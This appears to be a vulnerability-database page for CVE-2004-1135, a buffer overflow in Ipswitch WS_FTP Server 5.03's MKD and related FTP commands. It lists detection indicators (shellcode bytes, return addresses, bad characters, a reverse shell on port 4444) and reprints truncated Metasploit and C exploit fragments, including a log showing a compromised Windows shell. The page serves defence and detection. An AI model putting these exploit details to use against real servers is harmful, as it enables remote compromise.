CVE-2004-1135
Published: 2005-01-10
Priority: P4 · 31 · medium · 5 · CVSS 2.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
Exploit: available
EPSS: 49.64% (98.7th percentile)
Multiple buffer overflows in WS_FTP Server 5.03 2004.10.14 allow remote attackers to cause a denial of service (service crash) via long (1) SITE, (2) XMKD, (3) MKD, and (4) RNFR commands.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | ws_ftp_server | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x53\x9B\x2E\x7C
- bytes: \xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe
- Detect oversized MKD FTP command (>2000 bytes) sent to port 21, indicative of buffer overflow exploitation against WS_FTP Server 5.03.
- Detect oversized SITE, XMKD, and RNFR FTP commands (>2000 bytes) on port 21 as additional attack vectors for the same vulnerability.
- Check FTP banner for version string '5.0.3' to identify vulnerable WS_FTP Server instances; the Metasploit module flags this as Vulnerable.
- The exploit uses libeay32.dll ROP gadget (push esp; ret) at 0x25185bb8; presence of this return address in network traffic or memory is a strong exploit indicator.
- Payload bad characters for this exploit are: \x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e; shellcode in MKD payloads will avoid these bytes.
- The exploit opens a reverse shell on port 4444; monitor for unexpected outbound connections to port 4444 from FTP server processes.
- The alignment marker 'DEEF' (0x44454546) in the MKD argument is used to locate EIP offset; presence of this pattern in FTP MKD commands indicates exploit alignment probing.
- The Metasploit module targets WS-FTP Server 5.03 Universal using a single return address from libeay32.dll; the exploit requires a valid authenticated FTP session (Privileged => false) before sending the malicious MKD command.
- The win2k SP4 RET address (\x53\x9B\x2E\x7C) in the C exploit is platform-specific; the Metasploit module uses a different universal address (0x25185bb8 from libeay32.dll) intended to work on both XP and 2K.
- Metasploit payload space is limited to 480 bytes with a stack adjustment of -3500; payloads exceeding this space or containing bad characters will fail.
No detection rules found.
Exploit-DB: Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit) (exploitdb, 2010-10-05, CVE-2004-1135)
---
```ruby
##
# $Id: wsftp_server_503_mkd.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Class declaration and initialize() header restored; the indexed copy had
# lost them to HTML extraction. The snippet is truncated as indexed.
class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WS-FTP Server 5.03 MKD Overflow',
			'Description'    => %q{
					This module exploits the buffer overflow found in the MKD
				command in IPSWITCH WS_FTP Server 5.03 discovered by Reed
				Arvin.
			},
			'Author'         => [ 'et', 'Reed Arvin ' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'Platform'       => [ 'win' ],
			'References'     =>
				[
					[ 'CVE', '2004-1135' ],
					[ 'OSVDB', '12509' ],
					[
```
Exploit-DB: Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow (exploitdb, 2004-11-29, CVE-2004-1135)
---
```c
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
/* header names were lost in the indexed copy; snippet is truncated as indexed */
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /* win2k sp4 */

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
```
Metasploit: WS-FTP Server 5.03 MKD Overflow
This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin.
No writeups or analysis indexed.
References:
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029600.html
- http://marc.info/?l=bugtraq&m=110177654524819&w=2
- http://www.securiteam.com/exploits/6D00L2KBPG.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18296